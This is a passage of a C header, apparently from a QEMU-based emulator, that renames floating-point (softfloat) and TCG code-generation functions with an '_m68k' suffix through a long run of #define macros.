float32_is_signaling_nan float32_is_signaling_nan_m68k #define float64_is_quiet_nan float64_is_quiet_nan_m68k #define float64_is_signaling_nan float64_is_signaling_nan_m68k #define floatx80_is_quiet_nan floatx80_is_quiet_nan_m68k #define floatx80_is_signaling_nan floatx80_is_signaling_nan_m68k #define floatx80_silence_nan floatx80_silence_nan_m68k #define propagateFloatx80NaN propagateFloatx80NaN_m68k #define float128_is_quiet_nan float128_is_quiet_nan_m68k #define float128_is_signaling_nan float128_is_signaling_nan_m68k #define float128_silence_nan float128_silence_nan_m68k #define float16_add float16_add_m68k #define float16_sub float16_sub_m68k #define float32_add float32_add_m68k #define float32_sub float32_sub_m68k #define float64_add float64_add_m68k #define float64_sub float64_sub_m68k #define float16_mul float16_mul_m68k #define float32_mul float32_mul_m68k #define float64_mul float64_mul_m68k #define float16_muladd float16_muladd_m68k #define float32_muladd float32_muladd_m68k #define float64_muladd float64_muladd_m68k #define float16_div float16_div_m68k #define float32_div float32_div_m68k #define float64_div float64_div_m68k #define float16_to_float32 float16_to_float32_m68k #define float16_to_float64 float16_to_float64_m68k #define float32_to_float16 float32_to_float16_m68k #define float32_to_float64 float32_to_float64_m68k #define float64_to_float16 float64_to_float16_m68k #define float64_to_float32 float64_to_float32_m68k #define float16_round_to_int float16_round_to_int_m68k #define float32_round_to_int float32_round_to_int_m68k #define float64_round_to_int float64_round_to_int_m68k #define float16_to_int16_scalbn float16_to_int16_scalbn_m68k #define float16_to_int32_scalbn float16_to_int32_scalbn_m68k #define float16_to_int64_scalbn float16_to_int64_scalbn_m68k #define float32_to_int16_scalbn float32_to_int16_scalbn_m68k #define float32_to_int32_scalbn float32_to_int32_scalbn_m68k #define float32_to_int64_scalbn float32_to_int64_scalbn_m68k #define float64_to_int16_scalbn float64_to_int16_scalbn_m68k #define float64_to_int32_scalbn float64_to_int32_scalbn_m68k #define float64_to_int64_scalbn float64_to_int64_scalbn_m68k #define float16_to_int16 float16_to_int16_m68k #define float16_to_int32 float16_to_int32_m68k #define float16_to_int64 float16_to_int64_m68k #define float32_to_int16 float32_to_int16_m68k #define float32_to_int32 float32_to_int32_m68k #define float32_to_int64 float32_to_int64_m68k #define float64_to_int16 float64_to_int16_m68k #define float64_to_int32 float64_to_int32_m68k #define float64_to_int64 float64_to_int64_m68k #define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_m68k #define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_m68k #define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_m68k #define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_m68k #define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_m68k #define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_m68k #define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_m68k #define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_m68k #define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_m68k #define float16_to_uint16_scalbn float16_to_uint16_scalbn_m68k #define float16_to_uint32_scalbn float16_to_uint32_scalbn_m68k #define float16_to_uint64_scalbn float16_to_uint64_scalbn_m68k #define float32_to_uint16_scalbn float32_to_uint16_scalbn_m68k #define float32_to_uint32_scalbn float32_to_uint32_scalbn_m68k #define float32_to_uint64_scalbn float32_to_uint64_scalbn_m68k #define float64_to_uint16_scalbn float64_to_uint16_scalbn_m68k #define float64_to_uint32_scalbn float64_to_uint32_scalbn_m68k #define float64_to_uint64_scalbn float64_to_uint64_scalbn_m68k #define float16_to_uint16 float16_to_uint16_m68k #define float16_to_uint32 float16_to_uint32_m68k #define float16_to_uint64 float16_to_uint64_m68k #define float32_to_uint16 float32_to_uint16_m68k #define float32_to_uint32 float32_to_uint32_m68k #define float32_to_uint64 float32_to_uint64_m68k #define float64_to_uint16 float64_to_uint16_m68k #define float64_to_uint32 float64_to_uint32_m68k #define float64_to_uint64 float64_to_uint64_m68k #define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_m68k #define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_m68k #define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_m68k #define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_m68k #define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_m68k #define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_m68k #define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_m68k #define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_m68k #define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_m68k #define int64_to_float16_scalbn int64_to_float16_scalbn_m68k #define int32_to_float16_scalbn int32_to_float16_scalbn_m68k #define int16_to_float16_scalbn int16_to_float16_scalbn_m68k #define int64_to_float16 int64_to_float16_m68k #define int32_to_float16 int32_to_float16_m68k #define int16_to_float16 int16_to_float16_m68k #define int64_to_float32_scalbn int64_to_float32_scalbn_m68k #define int32_to_float32_scalbn int32_to_float32_scalbn_m68k #define int16_to_float32_scalbn int16_to_float32_scalbn_m68k #define int64_to_float32 int64_to_float32_m68k #define int32_to_float32 int32_to_float32_m68k #define int16_to_float32 int16_to_float32_m68k #define int64_to_float64_scalbn int64_to_float64_scalbn_m68k #define int32_to_float64_scalbn int32_to_float64_scalbn_m68k #define int16_to_float64_scalbn int16_to_float64_scalbn_m68k #define int64_to_float64 int64_to_float64_m68k #define int32_to_float64 int32_to_float64_m68k #define int16_to_float64 int16_to_float64_m68k #define uint64_to_float16_scalbn uint64_to_float16_scalbn_m68k #define uint32_to_float16_scalbn uint32_to_float16_scalbn_m68k #define uint16_to_float16_scalbn uint16_to_float16_scalbn_m68k #define uint64_to_float16 uint64_to_float16_m68k #define uint32_to_float16 uint32_to_float16_m68k #define uint16_to_float16 uint16_to_float16_m68k #define uint64_to_float32_scalbn uint64_to_float32_scalbn_m68k #define uint32_to_float32_scalbn uint32_to_float32_scalbn_m68k #define uint16_to_float32_scalbn uint16_to_float32_scalbn_m68k #define uint64_to_float32 uint64_to_float32_m68k #define uint32_to_float32 uint32_to_float32_m68k #define uint16_to_float32 uint16_to_float32_m68k #define uint64_to_float64_scalbn uint64_to_float64_scalbn_m68k #define uint32_to_float64_scalbn uint32_to_float64_scalbn_m68k #define uint16_to_float64_scalbn uint16_to_float64_scalbn_m68k #define uint64_to_float64 uint64_to_float64_m68k #define uint32_to_float64 uint32_to_float64_m68k #define uint16_to_float64 uint16_to_float64_m68k #define float16_min float16_min_m68k #define float16_minnum float16_minnum_m68k #define float16_minnummag float16_minnummag_m68k #define float16_max float16_max_m68k #define float16_maxnum float16_maxnum_m68k #define float16_maxnummag float16_maxnummag_m68k #define float32_min float32_min_m68k #define float32_minnum float32_minnum_m68k #define float32_minnummag float32_minnummag_m68k #define float32_max float32_max_m68k #define float32_maxnum float32_maxnum_m68k #define float32_maxnummag float32_maxnummag_m68k #define float64_min float64_min_m68k #define float64_minnum float64_minnum_m68k #define float64_minnummag float64_minnummag_m68k #define float64_max float64_max_m68k #define float64_maxnum float64_maxnum_m68k #define float64_maxnummag float64_maxnummag_m68k #define float16_compare float16_compare_m68k #define float16_compare_quiet float16_compare_quiet_m68k #define float32_compare float32_compare_m68k #define float32_compare_quiet float32_compare_quiet_m68k #define float64_compare float64_compare_m68k #define float64_compare_quiet float64_compare_quiet_m68k #define float16_scalbn float16_scalbn_m68k #define float32_scalbn float32_scalbn_m68k #define float64_scalbn float64_scalbn_m68k #define float16_sqrt float16_sqrt_m68k #define float32_sqrt float32_sqrt_m68k #define float64_sqrt float64_sqrt_m68k #define float16_default_nan float16_default_nan_m68k #define float32_default_nan float32_default_nan_m68k #define float64_default_nan float64_default_nan_m68k #define float128_default_nan float128_default_nan_m68k #define float16_silence_nan float16_silence_nan_m68k #define float32_silence_nan float32_silence_nan_m68k #define float64_silence_nan float64_silence_nan_m68k #define float16_squash_input_denormal float16_squash_input_denormal_m68k #define float32_squash_input_denormal float32_squash_input_denormal_m68k #define float64_squash_input_denormal float64_squash_input_denormal_m68k #define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_m68k #define roundAndPackFloatx80 roundAndPackFloatx80_m68k #define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_m68k #define int32_to_floatx80 int32_to_floatx80_m68k #define int32_to_float128 int32_to_float128_m68k #define int64_to_floatx80 int64_to_floatx80_m68k #define int64_to_float128 int64_to_float128_m68k #define uint64_to_float128 uint64_to_float128_m68k #define float32_to_floatx80 float32_to_floatx80_m68k #define float32_to_float128 float32_to_float128_m68k #define float32_rem float32_rem_m68k #define float32_exp2 float32_exp2_m68k #define float32_log2 float32_log2_m68k #define float32_eq float32_eq_m68k #define float32_le float32_le_m68k #define float32_lt float32_lt_m68k #define float32_unordered float32_unordered_m68k #define float32_eq_quiet float32_eq_quiet_m68k #define float32_le_quiet float32_le_quiet_m68k #define float32_lt_quiet float32_lt_quiet_m68k #define float32_unordered_quiet float32_unordered_quiet_m68k #define float64_to_floatx80 float64_to_floatx80_m68k #define float64_to_float128 float64_to_float128_m68k #define float64_rem float64_rem_m68k #define float64_log2 float64_log2_m68k #define float64_eq float64_eq_m68k #define float64_le float64_le_m68k #define float64_lt float64_lt_m68k #define float64_unordered float64_unordered_m68k #define float64_eq_quiet float64_eq_quiet_m68k #define float64_le_quiet float64_le_quiet_m68k #define float64_lt_quiet float64_lt_quiet_m68k #define float64_unordered_quiet float64_unordered_quiet_m68k #define floatx80_to_int32 floatx80_to_int32_m68k #define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_m68k #define floatx80_to_int64 floatx80_to_int64_m68k #define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_m68k #define floatx80_to_float32 floatx80_to_float32_m68k #define floatx80_to_float64 floatx80_to_float64_m68k #define floatx80_to_float128 floatx80_to_float128_m68k #define floatx80_round floatx80_round_m68k #define floatx80_round_to_int floatx80_round_to_int_m68k #define floatx80_add floatx80_add_m68k #define floatx80_sub floatx80_sub_m68k #define floatx80_mul floatx80_mul_m68k #define floatx80_div floatx80_div_m68k #define floatx80_rem floatx80_rem_m68k #define floatx80_sqrt floatx80_sqrt_m68k #define floatx80_eq floatx80_eq_m68k #define floatx80_le floatx80_le_m68k #define floatx80_lt floatx80_lt_m68k #define floatx80_unordered floatx80_unordered_m68k #define floatx80_eq_quiet floatx80_eq_quiet_m68k #define floatx80_le_quiet floatx80_le_quiet_m68k #define floatx80_lt_quiet floatx80_lt_quiet_m68k #define floatx80_unordered_quiet floatx80_unordered_quiet_m68k #define float128_to_int32 float128_to_int32_m68k #define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_m68k #define float128_to_int64 float128_to_int64_m68k #define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_m68k #define float128_to_uint64 float128_to_uint64_m68k #define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_m68k #define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_m68k #define float128_to_uint32 float128_to_uint32_m68k #define float128_to_float32 float128_to_float32_m68k #define float128_to_float64 float128_to_float64_m68k #define float128_to_floatx80 float128_to_floatx80_m68k #define float128_round_to_int float128_round_to_int_m68k #define float128_add float128_add_m68k #define float128_sub float128_sub_m68k #define float128_mul float128_mul_m68k #define float128_div float128_div_m68k #define float128_rem float128_rem_m68k #define float128_sqrt float128_sqrt_m68k #define float128_eq float128_eq_m68k #define float128_le float128_le_m68k #define float128_lt float128_lt_m68k #define float128_unordered float128_unordered_m68k #define float128_eq_quiet float128_eq_quiet_m68k #define float128_le_quiet float128_le_quiet_m68k #define float128_lt_quiet float128_lt_quiet_m68k #define float128_unordered_quiet float128_unordered_quiet_m68k #define floatx80_compare floatx80_compare_m68k #define floatx80_compare_quiet floatx80_compare_quiet_m68k #define float128_compare float128_compare_m68k #define float128_compare_quiet float128_compare_quiet_m68k #define floatx80_scalbn floatx80_scalbn_m68k #define float128_scalbn float128_scalbn_m68k #define softfloat_init softfloat_init_m68k #define tcg_optimize tcg_optimize_m68k #define gen_new_label gen_new_label_m68k #define tcg_can_emit_vec_op tcg_can_emit_vec_op_m68k #define tcg_expand_vec_op tcg_expand_vec_op_m68k #define tcg_register_jit tcg_register_jit_m68k #define tcg_tb_insert tcg_tb_insert_m68k #define tcg_tb_remove tcg_tb_remove_m68k #define tcg_tb_lookup tcg_tb_lookup_m68k #define tcg_tb_foreach tcg_tb_foreach_m68k #define tcg_nb_tbs tcg_nb_tbs_m68k #define tcg_region_reset_all tcg_region_reset_all_m68k #define tcg_region_init tcg_region_init_m68k #define tcg_code_size tcg_code_size_m68k #define tcg_code_capacity tcg_code_capacity_m68k #define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_m68k #define tcg_malloc_internal tcg_malloc_internal_m68k #define tcg_pool_reset tcg_pool_reset_m68k #define tcg_context_init tcg_context_init_m68k #define tcg_tb_alloc tcg_tb_alloc_m68k #define tcg_prologue_init tcg_prologue_init_m68k #define tcg_func_start tcg_func_start_m68k #define tcg_set_frame tcg_set_frame_m68k #define tcg_global_mem_new_internal tcg_global_mem_new_internal_m68k #define tcg_temp_new_internal tcg_temp_new_internal_m68k #define tcg_temp_new_vec tcg_temp_new_vec_m68k #define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_m68k #define tcg_temp_free_internal tcg_temp_free_internal_m68k #define tcg_const_i32 tcg_const_i32_m68k #define tcg_const_i64 tcg_const_i64_m68k #define tcg_const_local_i32 tcg_const_local_i32_m68k #define tcg_const_local_i64 tcg_const_local_i64_m68k #define tcg_op_supported tcg_op_supported_m68k #define tcg_gen_callN tcg_gen_callN_m68k #define tcg_op_remove tcg_op_remove_m68k #define tcg_emit_op tcg_emit_op_m68k #define tcg_op_insert_before tcg_op_insert_before_m68k #define tcg_op_insert_after tcg_op_insert_after_m68k #define tcg_cpu_exec_time tcg_cpu_exec_time_m68k #define tcg_gen_code tcg_gen_code_m68k #define tcg_gen_op1 tcg_gen_op1_m68k #define tcg_gen_op2 tcg_gen_op2_m68k #define tcg_gen_op3 tcg_gen_op3_m68k #define tcg_gen_op4 tcg_gen_op4_m68k #define tcg_gen_op5 tcg_gen_op5_m68k #define tcg_gen_op6 tcg_gen_op6_m68k #define tcg_gen_mb tcg_gen_mb_m68k #define tcg_gen_addi_i32 tcg_gen_addi_i32_m68k #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_m68k #define tcg_gen_subi_i32 tcg_gen_subi_i32_m68k #define tcg_gen_andi_i32 tcg_gen_andi_i32_m68k #define tcg_gen_ori_i32 tcg_gen_ori_i32_m68k #define tcg_gen_xori_i32 tcg_gen_xori_i32_m68k #define tcg_gen_shli_i32 tcg_gen_shli_i32_m68k #define tcg_gen_shri_i32 tcg_gen_shri_i32_m68k #define tcg_gen_sari_i32 tcg_gen_sari_i32_m68k #define tcg_gen_brcond_i32 tcg_gen_brcond_i32_m68k #define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_m68k #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_m68k #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_m68k #define tcg_gen_muli_i32 tcg_gen_muli_i32_m68k #define tcg_gen_div_i32 tcg_gen_div_i32_m68k #define tcg_gen_rem_i32 tcg_gen_rem_i32_m68k #define tcg_gen_divu_i32 tcg_gen_divu_i32_m68k #define tcg_gen_remu_i32 tcg_gen_remu_i32_m68k #define tcg_gen_andc_i32 tcg_gen_andc_i32_m68k #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_m68k #define tcg_gen_nand_i32 tcg_gen_nand_i32_m68k #define tcg_gen_nor_i32 tcg_gen_nor_i32_m68k #define tcg_gen_orc_i32 tcg_gen_orc_i32_m68k #define tcg_gen_clz_i32 tcg_gen_clz_i32_m68k #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_m68k #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_m68k #define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_m68k #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_m68k #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_m68k #define tcg_gen_rotl_i32 tcg_gen_rotl_i32_m68k #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_m68k #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_m68k #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_m68k #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_m68k #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_m68k #define tcg_gen_extract_i32 tcg_gen_extract_i32_m68k #define tcg_gen_sextract_i32 tcg_gen_sextract_i32_m68k #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_m68k #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_m68k #define tcg_gen_add2_i32 tcg_gen_add2_i32_m68k #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_m68k #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_m68k #define tcg_gen_muls2_i32 tcg_gen_muls2_i32_m68k #define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_m68k #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_m68k #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_m68k #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_m68k #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_m68k #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_m68k #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_m68k #define tcg_gen_smin_i32 tcg_gen_smin_i32_m68k #define tcg_gen_umin_i32 tcg_gen_umin_i32_m68k #define tcg_gen_smax_i32 tcg_gen_smax_i32_m68k #define tcg_gen_umax_i32 tcg_gen_umax_i32_m68k #define tcg_gen_abs_i32 tcg_gen_abs_i32_m68k #define tcg_gen_addi_i64 tcg_gen_addi_i64_m68k #define tcg_gen_subfi_i64 tcg_gen_subfi_i64_m68k #define tcg_gen_subi_i64 tcg_gen_subi_i64_m68k #define tcg_gen_andi_i64 tcg_gen_andi_i64_m68k #define tcg_gen_ori_i64 tcg_gen_ori_i64_m68k #define tcg_gen_xori_i64 tcg_gen_xori_i64_m68k #define tcg_gen_shli_i64 tcg_gen_shli_i64_m68k #define tcg_gen_shri_i64 tcg_gen_shri_i64_m68k #define tcg_gen_sari_i64 tcg_gen_sari_i64_m68k #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_m68k #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_m68k #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_m68k #define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_m68k #define tcg_gen_muli_i64 tcg_gen_muli_i64_m68k #define tcg_gen_div_i64 tcg_gen_div_i64_m68k #define tcg_gen_rem_i64 tcg_gen_rem_i64_m68k #define tcg_gen_divu_i64 tcg_gen_divu_i64_m68k #define tcg_gen_remu_i64 tcg_gen_remu_i64_m68k #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_m68k #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_m68k #define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_m68k #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_m68k #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_m68k #define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_m68k #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_m68k #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_m68k #define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_m68k #define tcg_gen_not_i64 tcg_gen_not_i64_m68k #define tcg_gen_andc_i64 tcg_gen_andc_i64_m68k #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_m68k #define tcg_gen_nand_i64 tcg_gen_nand_i64_m68k #define tcg_gen_nor_i64 tcg_gen_nor_i64_m68k #define tcg_gen_orc_i64 tcg_gen_orc_i64_m68k #define tcg_gen_clz_i64 tcg_gen_clz_i64_m68k #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_m68k #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_m68k #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_m68k #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_m68k #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_m68k #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_m68k #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_m68k #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_m68k #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_m68k #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_m68k #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_m68k #define tcg_gen_extract_i64 tcg_gen_extract_i64_m68k #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_m68k #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_m68k #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_m68k #define tcg_gen_add2_i64 tcg_gen_add2_i64_m68k #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_m68k #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_m68k #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_m68k #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_m68k #define tcg_gen_smin_i64 tcg_gen_smin_i64_m68k #define tcg_gen_umin_i64 tcg_gen_umin_i64_m68k #define tcg_gen_smax_i64 tcg_gen_smax_i64_m68k #define tcg_gen_umax_i64 tcg_gen_umax_i64_m68k #define tcg_gen_abs_i64 tcg_gen_abs_i64_m68k #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_m68k #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_m68k #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_m68k #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_m68k #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_m68k #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_m68k #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_m68k #define tcg_gen_exit_tb tcg_gen_exit_tb_m68k #define tcg_gen_goto_tb tcg_gen_goto_tb_m68k #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_m68k #define check_exit_request check_exit_request_m68k #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_m68k #define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_m68k #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_m68k #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_m68k #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_m68k #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_m68k #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_m68k #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_m68k #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_m68k #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_m68k #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_m68k #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_m68k #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_m68k #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_m68k #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_m68k #define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_m68k #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_m68k #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_m68k #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_m68k #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_m68k #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_m68k #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_m68k #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_m68k #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_m68k #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_m68k #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_m68k #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_m68k #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_m68k #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_m68k #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_m68k #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_m68k #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_m68k #define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_m68k #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_m68k #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_m68k #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_m68k #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_m68k #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_m68k #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_m68k #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_m68k #define simd_desc simd_desc_m68k #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_m68k #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_m68k #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_m68k #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_m68k #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_m68k #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_m68k #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_m68k #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_m68k #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_m68k #define tcg_gen_gvec_2 tcg_gen_gvec_2_m68k #define tcg_gen_gvec_2i tcg_gen_gvec_2i_m68k #define tcg_gen_gvec_2s tcg_gen_gvec_2s_m68k #define tcg_gen_gvec_3 tcg_gen_gvec_3_m68k #define tcg_gen_gvec_3i tcg_gen_gvec_3i_m68k #define tcg_gen_gvec_4 tcg_gen_gvec_4_m68k #define tcg_gen_gvec_mov tcg_gen_gvec_mov_m68k #define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_m68k #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_m68k #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_m68k #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_m68k #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_m68k #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_m68k #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_m68k #define tcg_gen_gvec_not tcg_gen_gvec_not_m68k #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_m68k #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_m68k #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_m68k #define tcg_gen_gvec_add tcg_gen_gvec_add_m68k #define tcg_gen_gvec_adds tcg_gen_gvec_adds_m68k #define tcg_gen_gvec_addi tcg_gen_gvec_addi_m68k #define tcg_gen_gvec_subs tcg_gen_gvec_subs_m68k #define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_m68k #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_m68k #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_m68k #define tcg_gen_gvec_sub tcg_gen_gvec_sub_m68k #define tcg_gen_gvec_mul tcg_gen_gvec_mul_m68k #define tcg_gen_gvec_muls tcg_gen_gvec_muls_m68k #define tcg_gen_gvec_muli tcg_gen_gvec_muli_m68k #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_m68k #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_m68k #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_m68k #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_m68k #define tcg_gen_gvec_smin tcg_gen_gvec_smin_m68k #define tcg_gen_gvec_umin tcg_gen_gvec_umin_m68k #define tcg_gen_gvec_smax tcg_gen_gvec_smax_m68k #define tcg_gen_gvec_umax tcg_gen_gvec_umax_m68k #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_m68k #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_m68k #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_m68k #define tcg_gen_gvec_neg tcg_gen_gvec_neg_m68k #define tcg_gen_gvec_abs tcg_gen_gvec_abs_m68k #define tcg_gen_gvec_and tcg_gen_gvec_and_m68k #define tcg_gen_gvec_or tcg_gen_gvec_or_m68k #define tcg_gen_gvec_xor tcg_gen_gvec_xor_m68k #define tcg_gen_gvec_andc 